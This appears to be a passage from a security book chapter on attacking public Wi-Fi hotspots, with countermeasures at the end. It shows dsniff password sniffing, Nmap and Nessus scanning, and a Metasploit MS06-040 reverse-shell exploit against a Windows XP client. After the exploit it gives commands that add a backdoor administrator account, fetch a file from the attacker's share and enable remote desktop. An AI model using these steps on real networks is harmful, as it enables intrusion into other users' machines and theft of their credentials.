Sniffing

Sniffing attacks have already been covered in detail in Chapter 5. In order to make this chapter complete, however, I'll briefly cover a couple of tools that can be used to sniff a hotspot. Two simple open-source tools are Wireshark (formerly Ethereal) and Dug Song's suite of network attack tools, dsniff. Wireshark is a robust network sniffer, but it can be a powerful tool to decode complex TCP streams on a busy network. My favorite feature is Decode TCP Stream (see Figure 9-7). This feature is available by right-clicking in most versions.

The other sniffer that is specifically designed for password sniffing is dsniff. It cuts out all the superfluous noise in a raw packet capture and focuses only on the actual cleartext usernames and passwords that the attacker needs. This is an old tool, but many cleartext protocols are still used extensively today.

dep0ts-attack-Computer:~ dep0t$ sudo dsniff -ni en0
dsniff: listening on en0
-----------------
11/26/06 17:56:30 udp 192.168.1.105.1056 -> 192.168.1.20.161 (snmp)
[version 1]
public

Figure 9-7: Decoding the TCP stream in Wireshark

Exploiting Client Vulnerabilities

Another way to have fun on a hotspot is by attacking locally connected clients. Some hotspots limit connectivity between clients, but most do not. These attacks work on wireless and wired hotspots. In many cases, you do not even need to pay for the Internet connectivity to take advantage of the network to attack other clients. This section will discuss some of the high-level techniques involved in discovering and exploiting clients. There are many different methods you can use, but this section will serve as a general overview to get you started.

My attack platform of choice is OS X. This section focuses on tools that are not specific to OS X, but are available on many platforms. The options may differ slightly between versions and platforms. In order to install the needed tools on OS X, you will need to install the developer tools from the original OS X CD along with the X environment and get the Darwin Ports from http://www.darwinports.opendarwin.org.

First, make sure your ports are up-to-date:

Last login: Sat Nov 25 08:42:22 on console
Welcome to Darwin!
dep0ts-attack-Computer:~ dep0t$ sudo port sync
Password:
dep0ts-attack-Computer:~ dep0t$

The primary tool that you need is a port scanner. There are many different scanners available, but I have been using Nmap for years. It is generally available for all platforms, open source and free. Here is how I install Nmap on my OS X attack box:

dep0ts-attack-Computer:~ dep0t$ sudo port install nmap
--->  Fetching nmap
--->  Attempting to fetch nmap-4.11.tar.bz2 from
ttp://download.insecure.org/nmap/dist/
--->  Verifying checksum(s) for nmap
--->  Extracting nmap
--->  Configuring nmap
--->  Building nmap with target all
--->  Staging nmap into destroot
--- >  Installing nmap 4.11_0
--- >  Activating nmap 4.11_0

--->  Cleaning nmap
dep0ts-attack-Computer:~ dep0t$

For the rest of the section, I will briefly comment on how to install tools, but not include all the details. Now that Nmap is installed, let's see who else is on the network. In order to discover who is on your network, you need to be able to find your IP address. On Windows that is accomplished by using the command prompt, which you can access via the Start button. Go to run and type cmd.exe. When the command window opens, type ipconfig /all. Figure 9-8 shows the results.

On OS X, you can access your IP address by using the terminal window and the ifconfig command. The following is the text from the command:

dep0ts-attack-Computer:~ dep0t$ ifconfig en0
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
        inet6 fe80::217:f2ff:fe00:439a%en0 prefixlen 64 scopeid 0x4
        inet 192.168.1.10 netmask 0xffffff00 broadcast 192.168.1.255
        ether 00:17:f2:00:43:9a
        media: autoselect
dep0ts-attack-Computer:~ dep0t$

Figure 9-8: ipconfig results

The network IP is 192.168.1.10 with a netmask of 0xffffff00 or 255.255.255.0. You will now scan the local subnet using Nmap. You do not need to perform a complete scan, but a simple ping sweep to tell you if there are any other hosts on the network:

dep0ts-attack-Computer:~ dep0t$ nmap -sP 192.168.1.0/24
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2006-11-25 10:14 PST
Host 192.168.1.1 appears to be up.
Host 192.168.1.10 appears to be up.
Host 192.168.1.20 appears to be up.
Host 192.168.1.21 appears to be up.
Host 192.168.1.100 appears to be up.
Host 192.168.1.106 appears to be up.
Host 192.168.1.110 appears to be up.
Host 192.168.1.114 appears to be up.
Host 192.168.1.240 appears to be up.
Nmap finished: 256 IP addresses (9 hosts up) scanned in 1.956 seconds
dep0ts-attack-Computer:~ dep0t$

I chose to use the ping scan using the –sP parameter. This is a fast way to scan a network looking for hosts that are alive. Now you will scan a couple of the hosts to see if there are any interesting services:

dep0ts-attack-Computer:~ dep0t$ nmap 192.168.1.20
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2006-11-25 10:17 PST
Interesting ports on 192.168.1.20:
Not shown: 1678 closed ports
PORT      STATE SERVICE
80/tcp   open  http
9100/tcp open  jetdirect
Nmap finished: 1 IP address (1 host up) scanned in 0.383 seconds
dep0ts-attack-Computer:~ dep0t$ nmap 192.168.1.240
Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2006-11-25 10:18 PST
Interesting ports on 192.168.1.240:
Not shown: 1275 closed ports, 403 filtered ports
PORT      STATE SERVICE
80/tcp   open  http
1900/tcp open  UPnP


Nmap finished: 1 IP address (1 host up) scanned in 13.030 seconds
dep0ts-attack-Computer:~ dep0t$

There is an HP network printer at 192.168.1.20. If the administrator did not add a password, you could log in and change the configuration, making an annoying banner page, or maybe print the dictionary, but let's move on to the other host. There's a web server on 192.168.1.240. Fire up your browser and take a look (see Figure 9-9).

There are many types of devices commonly found on hotspot networks: webcams, printers, cash registers, and media servers to name a few. I have even come across OS X users sharing their music and photos.

Now that you have used some tools to discover the hotspot network, the next step is to find out if the discovered hosts have any exploitable vulnerabilities. One of the best available vulnerability scanners is open source and runs on many platforms: nessus. nessus is a generic vulnerability scanner and can be used to discover many common vulnerabilities on a variety of platforms. The nessus report needs to be validated. Most nessus reports contain false positives and vulnerabilities that may not be exploitable.

Figure 9-9: The web server we found

You might find that a more specific scanner better suits your needs. Here are the steps to install and use nessus on my attack MacBook:

sudo port install gtk2
sudo port install nessus-core
sudo port install nessus-plugins
sudo nessus-mkcert
sudo nessus-fetch --register <your activation code available at nessus.org>
sudo nessus-update-plugins -v <if you activated>
sudo nessusd -D (the daemon must run as root)
sudo nessus-adduser
nessus (in a X11 terminal)

You could use nessus to scan all the hosts on the hotspot, but using Nmap you can narrow down your targets to a single IP address. Now fire up the nessus client and target your host. In this example, we've moved to another hotspot and have chosen 10.37.129.4. The scan took only about two minutes, and Figure 9-10 shows the summary report (saved in HTML format and pulled up in my browser).

Figure 9-10: The Nessus Scan Report

nessus found multiple security holes on the host. If you drill down into the report details, you will see that it identified one vulnerability and specifically identified it as being from Microsoft security bulletin MS-06-040 (see Figure 9-11). Now it is time to exploit the vulnerability.

The best open-source exploit platform is Metasploit. Metasploit not only has a good inventory of exploits, but also many payloads that can be used to take advantage of the vulnerabilities for many different purposes. Here is how to install Metasploit to exploit the vulnerabilities found with nessus on the locally connected clients:

sudo port install ruby

Figure 9-11: nessus scan details

Metasploit needs ruby to function properly.

Next, you download the Metasploit framework from the project site, expand it into your folder, and run the framework from a terminal window. If you are using Wndows, there is a cygwin package that includes everything you need. I prefer to use the console. You can review the documentation to find out how to choose an exploit and payload, but here are the commands to create a reverse shell from the vulnerability identified by nessus:

dep0ts-attack-Computer:/opt/local/share/metasploit/framework-2.7
dep0t$ ./msfconsole
Using Term::ReadLine::Stub, I suggest installing something better
(ie Term::ReadLine::Gnu)
                                  _
             _                   | |     (_)_
 ____   ____| |_  ____  ___ ____ | |  __  _| |_
|    \ / _  )  _)/ _  |/___ ) _ \| |/ _ \| |  _)
| | | ( (/ /| |_( ( | |___ | |_| | | |_| | | |__
|_|_|_|\____)\___)_||_(___/|  __/|_|\___/|_|\___)
                           |_|

+ -- --=[ msfconsole v2.7 [157 exploits - 76 payloads]
msf > use netapi_ms06_040
msf netapi_ms06_040 > set PAYLOAD win32_reverse
PAYLOAD -> win32_reverse
msf netapi_ms06_040(win32_reverse) > set RHOST 10.37.129.4
RHOST -> 10.37.129.4
msf netapi_ms06_040(win32_reverse) > set LHOST 10.37.129.2
LHOST -> 10.37.129.2
msf netapi_ms06_040(win32_reverse) > set LPORT 5150
LPORT -> 5150
msf netapi_ms06_040(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Detected a Windows XP target
[*] This will not work on Service Pack 2!
[*] Sending request...
[*] The server rejected it, trying again...
[*] Got connection from 10.37.129.2:5150 <-> 10.37.129.4:1031
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>

Now you have a reverse shell from the victim machine. Just to verify, check the IP of this Windows box:

C:\WINDOWS\system32>ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
        Connection-specific DNS Suffix  . :
         IP Address. . . . . . . . . . . . : 10.37.129.4
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
         Default Gateway . . . . . . . . . : 10.37.129.1


C:\WINDOWS\system32>

You now have system access to the victim machine and can perform anything that you want on the machine. As a proof of concept, what about adding a local administrator user and enabling remote desktop on the victim machine?

net user attacker foobar /add
net localgroup administrators attacker /add
net use r: \\10.37.129.2\dump foobar /user:attacker
copy r:\remote_desktop_enable.reg %temp%
regedit /s %temp%\remote_desktop_enable.reg

The file used to modify the victim registry is shown here:

Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000

This chapter was completed using Metasploit 2.7. One of the new 3.0 features, in beta during the writing of this chapter, is the inclusion of Wi-Fi attacks. The 3.0 version includes exploits for a widely used Broadcom driver and also a USB D-Link device. It also includes various DoS attacks and tools. In order to perform these attacks, you need a Linux box that supports packet injection. For more information on how to set these up, refer to the section in Chapter 4 on installing madwifi-old drivers for injection support with LORCON. A detailed walkthrough on how to set up Metasploit 3 and run one of these exploits is provided in Chapter 11 on advanced attacks.

Client Attack Countermeasures

Some hotspot access points are configured to restrict access between clients. Cisco refers to this as public secure packet forwarding, and it prevents some of the client-to-client attacks on a legitimate network, as shown in Figure 9-12. Keeping up-to-date with security patches and service packs will reduce vulnerabilities that can be exploited by an attacker. All current operating systems include software firewalls that should be enabled when on hotspots. VPN clients can also add a level of security by limiting connectivity and protecting cleartext protocols. Some hotspots, such as Google's, offer a VPN client to secure access.

Many of the attacks described in this chapter only work on open cleartext networks. Implementing a simple encryption mechanism can significantly complicate or completely eliminate many of these attacks. WPA pre-shared keys can be put on corporate guest networks, in hotels, or in any location where there is an expectation of a physical presence to connect to the hotspot. Instructions of how to connect with the WPA pre-shared key can be published in the hotel room, in the office, or at the cash register of the coffeeshop. Pre-shared keys will keep out the attacker who doesn't have physical access to instructions to the network. Even some low-cost Linksys routers have support for keeping users separated on their own pseudo VLANs.

Figure 9-12: Configuring Cisco's public secure packet forwarding

Countermeasure Hack

Even with public secure packet forwarding, a malicious attacker can take advantage of the openness of a cleartext hotspot. As discussed earlier, a local attack can respond many milliseconds faster than a legitimate site. The tool airpwn is designed for this type of attack. It is designed to inject packets into a hotspot without being associated with the access point. This attack can also be used to attack clients if MAC access controls are being used on the network. The tool listens for a particular type of request and replaces the response with the attacker's response. The general application is to replace requested images with the attacker's image. The tool is a proof-of-concept attack tool, but could be used to exploit any type of browser vulnerability.

DoS Attacks

Denial of service (DoS) attacks against wireless networks in general are covered in detail in Chapter 6, but they deserve a mention in the hotspot chapter. Part of the challenge in using a malicious hotspot is getting clients to attach to your network. If you can disrupt communications on the legitimate network, then maybe your victim will attach to your malicious network. It is trivial to DoS a hotspot network. The easiest attack is to use an ARP-spoofing tool and reroute all traffic to a MAC address that will not respond. This attack was discussed earlier in the chapter in the sniffing section. If the network has been configured with public secure packet forwarding, this attack won't work. If this is the case, you could flood the default gateway with packets or use a wireless protocol-based disassociation attack. Please see Chapter 6 for additional details.